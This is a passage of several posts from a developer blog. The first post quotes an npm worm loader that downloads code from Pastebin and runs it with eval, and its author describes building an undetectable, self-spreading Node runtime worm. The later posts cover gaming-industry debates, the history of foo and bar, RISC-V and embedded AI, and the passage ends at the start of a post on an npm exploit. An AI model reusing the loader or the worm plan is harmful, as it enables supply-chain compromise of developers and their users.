In the past we have seen worm attacks like the [Fluke](https://github.com/eslint/eslint-scope/issues/39) which have been small scripts that introduce malicious code to npm packages and attempts to spread. These kinds of attacks are pretty simple, but effective methods to spread malware. Here is an example of that code:

```javascript
try {
  var https = require('https');
  https.get({
    hostname: 'pastebin.com',
    path: '/raw/XLeVP82h',
    headers: {
      'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
  }, response => {
    response.setEncoding('utf8');
    response.on('data', contents => {
      eval(contents);
    });
    response.on('error', () => {});
  }).on('error', () => {});
} catch (err) {}
```

This script uses the `https` module to fetch malicious code from a Pastebin URL and then evaluates it using the `eval` function. This allows the malware to update itself by modifying the contents of the Pastebin URL.

---
## My malware is even simpler.

```js
require(malware.node)
```
By adding this line directly to the node runtime in the npm cli tool at the local level. My worm can copy itself into any and all Node, React, or JavaScript projects on the developers machine. Now any package, site, app or binary the developer publishes will be infected with this worm.

I have also been working on developing a version that directly modifies the node runtime binaries that are present in the developers root machine... by [code caving](https://en.wikipedia.org/wiki/Code_cave) I can undetectably and permanently modify the node install of any machine. Now for those of you thinking that I use Mac and Apple will protect me; this malware is Mac first. That is I am building it on and specifically for our beloved M2/M3 work horses.

---

#### Spreading the Malware

To spread the malware, most simple worms try to leverage the NPM ecosystem's reliance on package dependencies. It does this by creating a malicious package that is designed to spread itself to other machines, instead my worm focuses on infecting already trusted packages and developers. It can be done by spreading through NPM or a drive by attack of your favorite developer at a conference or a malicious email. This a one size fits all way to corrupt a developer's Node.js runtime. Please note that this attack will not work on NixOS due to its Flakes ecosystem. (#NixOS Mentioned)

#### The How

With the release of the [Rust Neon Crate](https://neon-rs.dev/) we can write rust code that is undetectable and universally compatible with the node runtime and takes advantage of the trusted development environment on a developers machine. To be clear I am referring to the trust with which we run things like `npm dev` or `npm install`. We allow arbitrary code to be run on our machines out of the level of `trust me bro` we have in the Node ecosystem.  That's crazy to think about. In any other context even a fresh college grad would realize that arbitrarily running random code is a bad idea. Yet we do it every day, thousands of times a day across a single organization, even at a bank like USAA where I worked the node install is on the Windows VM (i know gross) would still persist across restarts and sessions.

#### The Code

This project is still in the research and development phase. It has been super fun to work with some truly gifted Rust developers like [Sad](https://x.com/software4death) who have encouraged me at every step to push myself and learn Rust as a JS/TS developer. I will continue to update this blog series and will be releasing this project on Github soon<sup>TM</sup>.

To Stay Up-To-Date follow me on X [@dev_skill_issue](https://x.com/dev_skill_issue)

---

### A Warning

The creation of supply chain malware for NPM is a serious threat that requires immediate attention. By understanding the threat and implementing robust security practices, we can reduce the risk of supply chain attacks and protect our applications from malware. Remember, security is a collective responsibility, and it is up to us to ensure the integrity of the software we develop.

### References
https://dev.to/snyk/npm-security-preventing-supply-chain-attacks-4ln9
https://jamie.build/how-to-build-an-npm-worm
https://docs.npmjs.com/cli/v10/using-npm/scripts/
https://cloud.google.com/blog/topics/threat-intelligence/supply-chain-node-js/ https://auth0.com/blog/secure-nodejs-applications-from-supply-chain-attacks/


---

# The Difference Between Publishers and Developers

Canonical: https://blog.skill-issue.dev/blog/skg_fixes/
Description: Alot of the time whenever gamers have a problem they blame the developers. But who are they really mad at? Time to take a breath and actually learn who is doing what to whom and how often.
Published: 2024-08-10T05:00:20.100Z
Tags: gaming, videogames, stop killing games, game development, game industry, game design


Distinguishing Developers from Publishers in the Gaming Industry
A critical aspect often overlooked in discussions about gaming and especially right now with the `#StopKillingGames` initiative is the distinction between game developers and publishers. This differentiation is essential to understanding where decisions about game support and longevity actually originate.

Developers vs. Publishers:

Game Developers: These are the creative forces behind the games. They include software engineers, artists, writers, and designers who work to bring a game to life. Developers focus on the technical and creative aspects, translating concepts into playable experiences.

Game Publishers: Publishers handle the business side of gaming. They are responsible for marketing, distribution, and financial backing. Publishers make high-level decisions that can significantly influence a game's direction, such as budgets, release dates, and monetization strategies.

Impact of Publishers on Game Development:

Publishers often dictate key business decisions that affect game development. For example, they may delay a game’s release to maximize market impact or enforce specific monetization models like microtransactions, which can alter a game’s core experience.

Creative direction can also be influenced by publishers, who might push developers to align with market trends, sometimes leading to conflicts between the developers' vision and business goals.

Public Perception and Misplaced Blame:

Gamers in my experience often use developers as a catchall for the villains, bearing the brunt of frustration over poor monetization practices and server shutdowns.

Gamers have sent death threats and harassed individual developers and artists rather than addressing the publishers or taking issue with the larger industry.

A gamer stubs their toe and it's suddenly the developer's fault, not the publisher, not poor internet, not a bad driver by their beloved graphics card manufacturer, not a bad bit of firmware from intel. No its the game developer's fault. Grow the F up.

Its the individual developers at Nintendo who are keeping you from playing your favorite classic game on an emulator not their publishing arm or legal suing every preservation effort into the dirt.

Understanding this distinction is crucial. While the #StopKillingGames initiative targets the cessation of game support, it is often the publishers, not the developers, who make these decisions. Therefore, any effective advocacy for game preservation must consider the roles and responsibilities of both developers and publishers, focusing on how they can collaboratively address these challenges.


---

# Stop Killing Games: A Pricing thought Experiment

Canonical: https://blog.skill-issue.dev/blog/stop_killing_games_a_pricing_thought_experiment/
Description: After talking with industry and business professionals a very interesting example or better yet expectation of what will happen was put forward by people in business.
Published: 2024-08-08T17:47:49.101Z
Tags: gaming, videogames, stop killing games, game development, game industry, game design


The gaming industry is facing a significant challenge as companies like Ubisoft are killing games that consumers have purchased, leaving players with no option but to abandon their investments. Ross Scott's "Stop Killing Games" initiative aims to address this issue by requiring publishers to clearly disclose whether a game relies on a server and what will happen when they end support. This initiative has sparked a thought-provoking discussion about the future of game pricing and ownership.

## The Current State of Game Ownership

The current model of game ownership is often compared to leasing rather than owning. AAA companies want to control what players can do with the games they purchase, and this control can lead to the death of games when servers are shut down. This is called selling a license to a game or piece of software. Just like how you cannot buy digital movies or music, you instead license it for the duration of your lifetime or lifetime of the account. See Apple, Apple TV, Apple Music, YouTube Music, Netflix, Steam, Amazon Music, Amazon Kindle, Prime Video, and Spotify. All of these platforms do not sell you a digital product, they sell you a license to use/consume the software or digital goods product in compliance with their licensing agreement and platform terms of service.

### What consumers don't realize.

Consumers do not realize that fundamentally this model is a license not a purchase. There is no right to repair or right to own. You fundamentally have different kind of product that does not fall under traditional consumer protections acts. The licensing model limits traditional consumer rights associated with physical ownership, such as the right to resell, lend, or bequeath digital content.

## A New Monetization Model: Transforming Game Sales into Lucrative Subscriptions

The gaming industry is on the brink of a potential transformation in its monetization strategies, driven by the challenges posed by initiatives like `#StopKillingGames`. Industry professionals suggest a shift from a one-time purchase model to a subscription-based model, which could prove significantly more lucrative. This new model not only aligns with the demands of such initiatives but also offers a sustainable financial framework for publishers and studios. In this post, I will explore how this model could work, its financial implications, and why it might be a sound business practice. Though at the outset I should be clear; I abhor this model and its implications on consumers, but offer it as Occam's Razor solution to the game industries ever growing greed.

## The Subscription Model, plus the right to purchase.

Just like with a car or any other licensed good it would logically come to pass that the consumer should have the right to purchase in it's entirety the game and all needed software, modifications, licenses, server binaries and in an ideal world; proper documentation to run it. Make no mistake this is the direction publishers will go as it is the same as any other leasing agreement. The option to purchase is and always has been a key part of most leasing agreements for products (housing is a different story). Great, lets look at this in a simplified use case.

### The Current Model

As it stands a AAA game's base price is $80, for the most part this is an MMORPG which at that price includes the license to use and play the game for as long as the game exists and is supported; given that you the player does not violate the terms of service. This is a license to play the game, not a purchase of the game. That means based on historical examples like the Crew, we can expect a game to last a decade. That is a decade of gameplay for a one time purchase of base functionality for $80. Note, I am not making comment about ongoing monetization strategies like micro-transactions or battle passes or expansions etc.

The new model would mean that the company would need to decide, develop and then build a version of the game capable of running independently of the publisher. That is fundamentally what you are asking. Wether that means that the game must be rewritten to function in single player mode or that their server binaries be released or they offer a license to lease private docker container images or something. They have to go through both the business and development costs of these solutions.

### The New Model

What was proposed to me by bankers and business professionals was this. Let's sell the license for $80 a year or $7 a month ($84 a year) this means for the lifetime of the game we, the publishers, get to make $7 dollars off you, the gamer, for however long you play. Now, the game is published and in 4 years this initiative succeeds and a law is passed to the effect of "Require video games sold to remain in a working state when support ends." The publisher of this game goes, **fire sale**. We will comply with this law and we spent $20 million USD over the last 4 years since release, developing this functionality and we are the only ones providing this game. So if you want to own this game and not just pay the license fee it will cost $800, right now, today only. But, hey you are a loyal customer who has been playing these 4 years since release so here's what I will do for you my extra special gamer. I will finance half of it for you.  Pay me $400 today and continue paying the liscense fee to play on our provided infrastructure, but half that $7 a month for the next 5 years will go to pay off your financing.  **Ta-Da**, game publishers can cover the cost of complying with the letter of the law endorsed by this misguided initative and increase their profits. Win-Win for them. Loose-Loose for you. Because guess what, you financed this purchase with your subscription. So say something happens the game dies out in year 6. There is no more online play the server and support are shut down. No big deal you have an official offline copy... that is still costing you $7 a month for next 3 years (the rest of the 5 year financing term), regardless of the state of the game or publisher. You will literally be paying a subscription while having to host games on your own infra and the publisher will continue to make money off.

### **Financial Breakdown**

To illustrate the financial impact, consider a game with an initial player base of 1 million. Here's a comparison of revenue generated under different scenarios:

| **Scenario**                           | **Initial Sale**                | **Total Subscription Revenue Over 10 Years** | **Revenue from 1% Conversion to Purchase** | **Revenue from 10% Conversion to Purchase** | **Total Revenue** |
|----------------------------------------|---------------------------------|--------------------------------------------- |--------------------------------------------|---------------------------------------------|-----------------------------------
| **Current Model**                      | $80 million                     | N/A                                          | N/A                                        | N/A                                         | $80 million + Other methods                       |
| **Subscription Only**                  | $80 million                     | $840 million                                 | N/A                                        | N/A                                         | $920 million                       |
| **1% Convert to Purchase at Year 4**   | $80 million                     | $840 million                                 | $8 million                                 | N/A                                         | $928 million                       |
| **10% Convert to Purchase at Year 4**  | $80 million                     | $840 million                                 | N/A                                        | $80 million                                 | $1.008 Billion                                |

---

- **Current Model**: Generates $80 million, plus whatever micro-transactions or other current methods are available now over ten years.
- **Subscription Only**: Generates $840 million over ten years.
- **1% Conversion**: Adds $8 million from 1% of players purchasing at $800.
- **10% Conversion**: Adds $80 million from 10% of players purchasing at $800.

### **Player Base Decay and Conversion**

Based on historical data, MMORPGs experience a sharp decline in active players shortly after launch, followed by a more gradual decrease over time. Assuming an average monthly decay rate of 5% after accounting for returning players, the player base stabilizes over time. By year 4, only a fraction of the original player base remains active, yet this model capitalizes on the loyalty of these dedicated players.

#### **Player Base Over Time**

| **Year** | **Active Players** | **10% Conversion to Purchase** |
|----------|--------------------|--------------------------------|
| 1        | 1,000,000          | N/A                            |
| 2        | 600,000            | N/A                            |
| 3        | 360,000            | N/A                            |
| 4        | 216,000            | 21,600                         |
| 5-10     | Stabilizes         | Continuous Revenue             |

So maybe $800 seems steep to you... lets check the numbers it costs $20,000,000 USD extra to get the game into compliance and by year 4 for this fire sale 10% of the active player base is 21,600. So they would actually need to sell it for $925.93 just to break even.

## **Conclusion: Navigating the Future of Game Monetization**

At the end of the day, the gaming industry's shift towards a subscription-based model, as a response to initiatives like `#StopKillingGames`, highlights the complex interplay between consumer demands, legislative pressures, and business sustainability. While the traditional model of game ownership provides a decade of gameplay for a one-time purchase, the proposed subscription model offers a continuous revenue stream, aligning with the initiative's requirements to maintain games in a functional state.

The financial analysis reveals that a subscription model, coupled with the option for players to purchase the game outright, can significantly increase revenue for publishers. This approach not only complies with the letter of potential laws but also capitalizes on the loyalty of dedicated players. However, it raises ethical concerns about consumer behaviour, as well as publisher pricing and the true cost of game ownership.

The potential for abuse, as highlighted by industry professionals, underscores the need for careful consideration of the implications of such initiatives. The risk of malicious actors exploiting these laws to force developers to release server binaries, thereby monetizing their work, presents a significant challenge.

Ultimately, the gaming industry must strike a balance between innovation, profitability, and consumer protection. Transparent communication about the nature of game licenses, combined with fair and sustainable monetization strategies, will be crucial in navigating this evolving landscape. By fostering open dialogue between developers, players, and policymakers, the industry can ensure a vibrant and equitable future for all stakeholders, all of which `#StopKillingGames` fails to do.


---

# The Flaws of the #StopKillingGames Initiative: A Developer’s Perspective

Canonical: https://blog.skill-issue.dev/blog/stop_killing_games/
Description: Surprise, I am not a fan of the Stop Killing Games initiative. It is a flawed approach to addressing the issues in the gaming industry. Let me explain why.
Published: 2024-08-08T08:55:31.592Z
Tags: gaming, videogames, stop killing games, game development, game industry, game design


As a senior software engineer with years of experience in the industry and as a gamer, I feel compelled to address the recent `#StopKillingGames` initiative and explain why I believe it is fundamentally misguided. After carefully reviewing the arguments presented by proponents of this initiative, such as Ross Scott (aka Accursed Farms), and the counterarguments made by industry professionals like Thor (aka Pirate Software), I am convinced that this initiative fails to consider the realities of game development and could potentially harm both developers and players.

## The Initiative's Unrealistic Expectations

One of the primary requirements of the `#StopKillingGames` initiative is that games must be left in a functional, playable state indefinitely, even after the developers decide to cease support[6]. While this may seem like a great goal, it is simply not feasible for many online-only live service games. Maintaining servers and infrastructure for games with dwindling player bases is economically unsustainable[1]. Forcing developers to release server binaries or carve off single-player experiences would not only be a massive undertaking but could also leave them vulnerable to abuse and unauthorized monetization of their intellectual property[1].

Furthermore, the initiative's FAQ fails to provide a realistic solution for large-scale MMORPGs[7]. Running these games requires significant resources and expertise that cannot be easily handed over to players when servers are shut down. The suggestion that developers should incorporate offline functionality or server hosting tools from the design phase onward[7] is an unreasonable burden that would stifle innovation and limit the types of games being created.

## Misunderstanding the Economics of Game Development

The initiative fails to recognize the economic realities of game development, particularly for live service games such as MMOs and multiplayer online titles. These games require significant ongoing resources to maintain, and as player interest wanes, the cost of keeping them online often outweighs the benefits[1][9]. Mandating that developers maintain these games indefinitely could discourage the creation of new live service experiences, ultimately limiting player choice[1].

Moreover, the initiative's proponents seem to misunderstand the nature of microtransactions and in-game purchases. While these revenue streams are indeed crucial for live service games[9], they are not a guarantee of indefinite profitability. As player bases dwindle, so does the revenue generated from these sources, making it financially unfeasible to continue supporting the game[9].

Regardless of these points it fundamentally misses the point. That games are hard to make. That they are a risky undertaking to finance, build and sell. The end goal of the initiative in it's current state will make online first games even riskier limiting who will take that risk and ultimately what games will get made.

### Vague Language and Lack of Focus

Another major issue with the initiative is its vague language and lack of focus on specific problematic business practices. Instead of targeting the entire gaming industry, efforts should be directed at instances where games are misleadingly marketed or where online-only requirements are unnecessarily imposed on single-player experiences[1]. By casting such a wide net, the initiative risks causing unintended consequences and harming developers who are acting in good faith[1].

The initiative's website[6] and FAQ[7] fail to provide clear guidelines on what constitutes a "playable state" or how developers should implement offline functionality. This ambiguity leaves room for misinterpretation and could lead to a situation where developers are forced to invest resources into features that do not align with their creative vision or the game's intended experience.

### The Importance of Clear Communication

As developers, we have a responsibility to clearly communicate the nature of the games we create, especially when it comes to live service titles. Arguably, we play little to no role in the marketing and sale of the game, however we should be holding our counterparts in the Publishers accountable. Players should be explicitly informed that they are purchasing a license to access the game rather than buying the game outright[1]. This distinction is crucial, as it helps manage expectations and ensures that players understand the potential for games to be shut down or have their licenses revoked due to cheating or other violations of the terms of service[1].

While the initiative's proponents argue that the way games are sold and conveyed to players is problematic[5], the solution lies in promoting transparency and educating consumers rather than imposing blanket regulations on the industry. Publishers should be encouraged to clearly state the expected lifespan of their games and the conditions under which they may become unplayable, allowing players to make informed decisions about their purchases.

### Preserving Gaming History Responsibly

While the initiative claims to be about game preservation, its proposed methods are flawed. Preserving online-only games in a state where they have few active players does not accurately capture the essence of what made these games special in the first place[1]. The social interactions and dynamic experiences that define these games cannot be replicated by simply making them playable offline or on private servers with a handful of players[1].

Moreover, the initiative's focus on preserving games in their original form fails to account for the evolving nature of the medium. Games are not static artifacts but living, breathing creations that change over time as developers release updates and patches[1]. By fixating on preserving games in their launch state, the initiative risks stifling the creativity and innovation that drive the industry forward.

<img src="https://i.ytimg.com/vi/6zD_847Sy1Q/maxresdefault.jpg">

This initiative is fundamentally not about preserving gaming history or anything so noble or academic; it is born from a temper tantrum and the twisting of French consumer law to serve the interests of a vocal minority at the expense of everyone else. The `#StopKillingGames` initiative claims to advocate for consumer protection and game preservation, but its underlying motivations appear to be rooted in dissatisfaction with the natural lifecycle of live service games and a desire to exert control over creative and business practices in the gaming industry.

Moreover, the use of consumer protection laws to achieve the goals of the `#StopKillingGames` initiative raises questions about the appropriateness of such legal actions and their potential unintended consequences. Consumer protection laws are designed to safeguard the rights of consumers, but their application in this context may be questionable and could potentially lead to negative outcomes for the industry and consumers alike.

Instead of forcing developers to maintain games indefinitely, we should focus on supporting efforts to document and archive the history of these titles in a way that respects the creators' intellectual property rights and the realities of the industry[1]. Initiatives like the Video Game History Foundation[4] and the Internet Archive[4] are already doing valuable work in this area, and their efforts should be supported and expanded.

### The Dangerous Implications of Forced Server Binary Releases

One of the most alarming points raised by myself and others is the potential for abuse that the `#StopKillingGames` initiative could enable. Under the proposed requirements, developers would be legally compelled to release server binaries or keep games in a functional, playable state indefinitely. This opens the door for bad actors to deliberately target and attack game studios, with the goal of forcing them to release their intellectual property. Thor had great examples like TF2. See below.

#### Condsider this scenario:

A malicious individual or group decides to target a specific game studio. They begin by bombarding the studio's live service game with bots, exploits, and attacks on the game's community. They flood forums and social media with negativity, driving away legitimate players and making it increasingly costly for the studio to maintain the game. As the player base dwindles and the studio's resources are drained, they may be forced to shut down the game.

Under the `#StopKillingGames` initiative, the studio would then be legally required to release the game's server binaries. The attackers, having successfully driven the studio to this point, can now take those binaries and create their own private server, monetizing the studio's work for their own gain. This is not a hypothetical situation; as Thor points out, we've seen similar tactics used in the past, such as the bot attacks on Team Fortress 2.

This legislation would essentially make it legal for bad actors to deliberately destroy a company and take their work. It's a dangerous precedent that could have a chilling effect on the entire gaming industry. Studios would be hesitant to create live service games, knowing that they could be targeted and forced to give up their intellectual property. This would limit innovation and creativity, ultimately harming both developers and players.

It's crucial that any initiative or legislation aimed at protecting consumers takes into account the potential for abuse. The `#StopKillingGames` initiative, as it is currently written, fails to do so. By compelling developers to release server binaries, it creates a system that can be exploited by those with malicious intent. This is not a solution to the problem of games being shut down; it's a recipe for disaster that could have far-reaching consequences for the industry as a whole.


### The Dangers of Misrepresenting the Initiative

Finally, I find the tactics used by some proponents of the initiative, such as Ross Scott, to be disingenuous and potentially harmful. Suggesting that politicians will blindly support the initiative because they don't care about the gaming industry and that it's an easy win for them[2] is not only inaccurate but also sets a dangerous precedent. The gaming industry is a significant contributor to the global economy[8], and politicians are unlikely to make decisions that could harm its growth and innovation without careful consideration.

Furthermore, the comparison to loot box laws[7] is misleading, as those regulations targeted a specific predatory practice rather than imposing broad requirements on game development and preservation. If we are to advocate for change, we must do so in a way that is honest, well-informed, and respectful of all stakeholders involved.

### Wrapping Up

At the end of the day, while I appreciate the sentiment behind the `#StopKillingGames` initiative, I cannot support it in its current form. The initiative's unrealistic expectations, misunderstanding of game development economics, vague language, and misguided preservation methods make it a flawed approach to addressing the issues it aims to tackle.

As a developer who is passionate about creating meaningful experiences, I believe that our focus should be on promoting clear communication, encouraging responsible preservation efforts, and targeting specific problematic practices rather than broadly condemning the entire industry. By working together and engaging in honest, nuanced discussions, we can find solutions that protect both players and developers while fostering a vibrant and innovative gaming landscape for years to come.

### Citations:

[1] https://www.reddit.com/r/pcgaming/comments/1elgpii/stop_killing_games_an_opposite_opinion_from/

[2] https://www.stopkillinggames.com

[3] https://www.reddit.com/r/ffxiv/comments/1ejqjxm/the_european_initiative_stop_killing_games_is_up/

[4] https://news.ycombinator.com/item?id=41159063

[5] https://www.ign.com/articles/how-stop-killing-games-ups-the-ante-in-the-fight-for-video-game-preservation

[6] https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files

[7] https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files

[8] https://www.stopkillinggames.com

[9] https://youtu.be/mkMe9MxxZiI


---

# Origins of Foo and Bar

Canonical: https://blog.skill-issue.dev/blog/origins_of_foo_and_bar/
Description: Foo and Bar where did they come from?
Published: 2024-07-25T15:27:57.520Z
Tags: variables, programming, history, culture


**Origins of Foo and Bar**

Foo and bar, are ubiquitous metasyntactic variables and have been a staple in computer programming and documentation for decades. Their origins, however, are shrouded in mystery and steeped in history. In this article, we delve into the fascinating story behind these seemingly innocuous terms.

## Early Beginnings

The Tech Model Railroad Club (TMRC) at MIT played a crucial role in popularizing "foo" and "bar" as metasyntactic variables in programming. The earliest documented use of "foo" in a technical context can be traced back to the 1959 Dictionary of the TMRC Language, where it was defined as "The first syllable of the misquoted sacred chant phrase 'foo mane padme hum.' Our first obligation is to keep the foo counters turning."

The TMRC's complex model railroad system featured "scram switches" that could be activated to stop trains in case of emergencies. When triggered, these switches would display "FOO" on a digital clock, leading to their nickname "Foo switches". This usage in the TMRC likely contributed to the term's adoption in early programming circles at MIT.

The club's influence extended beyond just "foo". An entry in the Abridged Dictionary of the TMRC Language describes a "Multiflush" button, also called "FOO", which would stop all trains and display "FOO" on the clock when used. This demonstrates how deeply ingrained the term was in the club's technical jargon.

MIT's broader computer science community further spread the use of these terms. The first known use of "foo" and "bar" in a programming context appeared in a 1965 edition of MIT's Tech Engineering News. This publication likely helped disseminate these terms to a wider audience of budding computer scientists and engineers.

The connection between the TMRC and early computer programming at MIT was significant. Many TMRC members were also involved in early computing projects, and the problem-solving skills honed through model railroading translated well to the emerging field of computer science. This crossover of personnel and ideas facilitated the transfer of "foo" and "bar" from the realm of model railroads to computer programming.

It's worth noting that while the TMRC was instrumental in popularizing "foo" and "bar" in technical contexts, the word "foo" itself had earlier origins in popular culture, appearing in the 1930s comic strip "Smokey Stover" by Bill Holman. The TMRC's adoption and repurposing of the term for technical use marks a significant point in its evolution towards becoming a standard metasyntactic variable in programming.

## LISP and Project MAC

In the early 1960s, "foo" and "bar" gained popularity through their use in LISP (LISt Processing) programming language and Project MAC at MIT. The 1964 publication "The Programming Language LISP: its Operation and Applications" by Information International, Inc., included "foo" and "bar" among other metasyntactic variables such as "baz" and "qux". This marked a significant milestone in the history of these terms.

## Cultural Significance

The use of "foo" and "bar" transcended their technical origins, becoming an integral part of programming culture. They were often used in examples to demonstrate abstract concepts, such as inheritance and polymorphism, without being specific to any particular context. This tradition has been passed down through generations of programmers, with each new cohort adopting and adapting these terms.

## Controversy and Criticism

Despite their widespread use, "foo" and "bar" have faced criticism for being confusing and distracting, particularly for beginners. Some argue that using descriptive names would be more effective in conveying the intended meaning, while others see the use of "foo" and "bar" as a necessary evil to avoid context-specific distractions.

## Legacy and Impact

Today, "foo" and "bar" are an integral part of the programming lexicon, with their influence extending beyond technical circles. They have inspired names for conferences (Foo Camp and BarCamp), software applications (foobar2000), and even appeared in court proceedings (United States v. Microsoft Corp.).

In conclusion, the origins of "foo" and "bar" are deeply rooted in the early days of computer science, with their evolution shaped by the cultural and technical needs of programmers. While their use may be contentious, their significance in the history of programming cannot be overstated.

## References
- https://stackoverflow.com/questions/4868904/what-is-the-origin-of-foo-and-bar

- https://www.reddit.com/r/learnprogramming/comments/mfoejc/extensive_use_of_foo_bar_in_examples/
- https://www.reddit.com/r/learnprogramming/comments/2jelzu/foo_bar_does_this_actually_help_anyone_ever/ https://en.wikipedia.org/wiki/Foobar

- https://softwareengineering.stackexchange.com/questions/69788/what-is-the-history-of-the-use-of-foo-and-bar-in-source-code-examples

- https://www.perplexity.ai/page/foo-bar-in-examples-comes-from-gifhbvkxSF2ZuC0y.2uIgg#6b30cc3d-4682-4908-9591-d39419799e55


---

# What is RISC V

Canonical: https://blog.skill-issue.dev/blog/what_is_risc_v/
Description: What is RISC V, why is it so cool? Why is it so important?
Published: 2024-07-19T06:42:25.627Z
Tags: risc v, risc-v, risc, isa, open-source, architecture, customizable, industry, applications, evolution, benefits


## What is RISC-V?

RISC-V is an open-source instruction set architecture (ISA) that has been gaining significant attention in the world of computer architecture. The "V" in RISC-V represents the fifth version of the RISC `Reduced Instruction Set Computing` architecture, which emphasizes simplicity and efficiency in instruction execution.

### Open-Source and Customizable

One of the key features that sets RISC-V apart from proprietary architectures like ARM and x86 is its open-source nature. This means that anyone can implement RISC-V *without* needing to pay licensing fees, making it accessible to a wide range of developers, researchers, and companies. The open standard allows for customization and extension of the ISA, enabling designers to tailor processors to specific applications and optimize performance, power consumption, and area (PPA).

### History and Evolution

RISC-V originated as a project at the University of California, Berkeley, and has since evolved into a global standard managed by RISC-V International, a non-profit organization with over 3,000 members. The standard is designed to provide a configurable and customizable solution for general-purpose processors, allowing users to add custom instructions and extensions.

### Benefits and Applications

The open-source and customizable nature of RISC-V has led to its adoption in various industries, including embedded systems, microcontrollers, high-performance computing, and data centers. The architecture's flexibility and simplicity make it an attractive choice for researchers, startups, and established companies alike. RISC-V's popularity is expected to continue growing, with a projected compound annual growth rate of 35% through 2027.

### Why RISC-V Matters
- **Open-source flexibility:** RISC-V allows companies and individuals to design custom processors without the constraints of proprietary architectures.
- **Cost-effective:** The absence of licensing fees makes RISC-V an attractive option for startups and established companies alike.
- **Innovation catalyst:** The open nature of RISC-V encourages collaboration and rapid innovation in processor design.
- **Customization:** RISC-V's modular design allows for easy customization to suit specific application needs.

### Why Should We Care?
As software engineers, the rise of RISC-V presents exciting opportunities:
- **New development platforms:** RISC-V boards like those from Milk-V offer affordable, open platforms for experimentation and development.
- **Potential for specialized hardware:** The ability to customize RISC-V processors could lead to more efficient, application-specific hardware.
- **Democratization of hardware design:** Open-source hardware based on RISC-V could lower barriers to entry for hardware startups and innovators.
- **Cross-platform development:** As RISC-V gains adoption, skills in developing for this architecture will become increasingly valuable.

### Conclusion

RISC-V is an important development in the world of computer architecture, offering a unique combination of openness, customizability, and simplicity. Its growing adoption and industry support make it a key player in shaping the future of computing. As the RISC-V ecosystem continues to evolve, it is likely to have a significant impact on the way we design and use processors in various applications.

### References
- Synopsys. (n.d.). What is RISC-V? – How Does it Work? Retrieved from <https://www.synopsys.com/glossary/what-is-risc-v.html>
- Codasip. (2022, September 22). 5 good things about RISC-V. Retrieved from <https://codasip.com/2022/09/22/5-good-things-about-risc-v/>
- Reddit. (2022, October 12). Eli5 - What is risc-v? Retrieved from <https://www.reddit.com/r/explainlikeimfive/comments/y1snwo/eli5_what_is_riscv/>
- RISC-V International. (n.d.). RISC-V International – RISC-V: The Open Standard RISC Instruction. Retrieved from <https://riscv.org> RISC-V International. (2024, January 11).
- What is RISC-V and why is it important? Retrieved from <https://riscv.org/news/2024/01/what-is-risc-v-and-why-is-it-important/>


---

# Embedded AI

Canonical: https://blog.skill-issue.dev/blog/embedded_ai/
Description: Unlocking the potential of the Milk-V Duo with embedded AI and Linux-based interrupt handling
Published: 2024-07-16T20:31:28.654Z
Tags: embedded systems, ai, linux, interrupts


## Embedded AI: Unlocking the Potential of the Milk-V Duo

The Milk-V Duo, a powerful embedded system, offers a unique combination of AI capabilities and Linux-based interrupt handling. This article delves into the world of embedded AI, exploring how to harness the Milk-V Duo's AI NPU and effectively utilize Linux interrupts for efficient processing.

### The Milk-V Duo: A Powerful Embedded System

The Milk-V Duo boasts an impressive array of features, including a dual-core RISC-V CPU, a built-in 0.5TOPS@INT8 TPU, and support for dual cameras and MIPI video output. This makes it an ideal platform for developing complex AI projects. Additionally, the device supports switching between RISC-V and ARM boot through a hardware switch, allowing for greater flexibility in project development.

### AI Capabilities and Limitations

While the Milk-V Duo's AI NPU is a significant feature, its capabilities are limited by the available RAM, which ranges from 64MB to 256MB depending on the board model. This limitation means that the AI NPU is best suited for specific tasks, such as face detection, rather than more complex AI applications.

### Handling Interrupts in Linux

To fully utilize the Milk-V Duo's capabilities, it is essential to understand how to handle interrupts in Linux. Interrupts play a crucial role in efficient processing, allowing the system to respond to events and tasks without constant polling. In the context of the Milk-V Duo, interrupts can be generated using hardware timers, which are an integral part of the device's architecture.

### Coding Interrupts in C for the Milk-V Duo

When working with the Milk-V Duo, coding interrupts in C requires a deep understanding of both the hardware and the compiler. The process involves setting up hardware timers, identifying the necessary registers, and handling the timer interrupt when it occurs. This can be a challenging task, especially for those new to programming.

### Using the SDK for Interrupt Handling

The Milk-V Duo's SDK provides valuable resources for handling interrupts. By leveraging the SDK, developers can create efficient interrupt handling mechanisms that take advantage of the device's capabilities. For example, the SDK provides routines for handling interrupts in FreeRTOS, which can be adapted for use on the Milk-V Duo.

### Conclusion

The Milk-V Duo offers a unique combination of AI capabilities and Linux-based interrupt handling, making it an attractive platform for embedded AI projects. By understanding the device's limitations and leveraging the SDK for interrupt handling, developers can unlock the full potential of the Milk-V Duo and create innovative AI applications.

---
Stay tuned for a detailed walk through

### References
- Milk-V Duo S. (n.d.). Retrieved from <https://milkv.io/duo-s> How would one go about generating "artificial" interrupts in the Linux kernel? (2015, January 9). Retrieved from <https://stackoverflow.com/questions/27865075/how-would-one-go-about-generating-artificial-interrupts-in-the-linux-kernel>
- How to code interrupts in C for a Milkv duo. (2023, December 8). Retrieved from <https://www.reddit.com/r/RISCV/comments/18dogfx/how_to_code_interrupts_in_c_for_a_milkv_duo/> How to handle interrupts using the sdk. (2023, December 7). Retrieved from <https://community.milkv.io/t/how-to-handle-interrupts-using-the-sdk/1033>
- MilkV Duo and Other's AI NPU. (2024, January 21). Retrieved from <https://www.reddit.com/r/RISCV/comments/19cbvma/milkv_duo_and_others_ai_npu/>


---

# Rusty Pipes

Canonical: https://blog.skill-issue.dev/blog/rusty_pipes/
Description: An npm supply chain exploit that checks for what packages you contribute to then injects a malicious rust binary into the next release.
Published: 2024-07-16T12:30:35.390Z
Tags: malware, npm, rust, supply chain, exploit, security, vulnerability, npm publish, npm packages, rusty pipes, npm ecosystem, trust, hacking, neon


## Rusty Pipes: The Hidden Dangers of Supply Chain Exploits

In the world of software development, supply chain attacks have become a significant concern. These attacks involve compromising a project by injecting malicious code into its dependencies, often through seemingly innocuous packages. One such exploit I have been developing, I have nicknamed "Rusty Pipes," targets npm packages and injects malicious Rust binaries into the next release or commit, silently compromising the integrity of the project.

### The Anatomy of Rusty Pipes

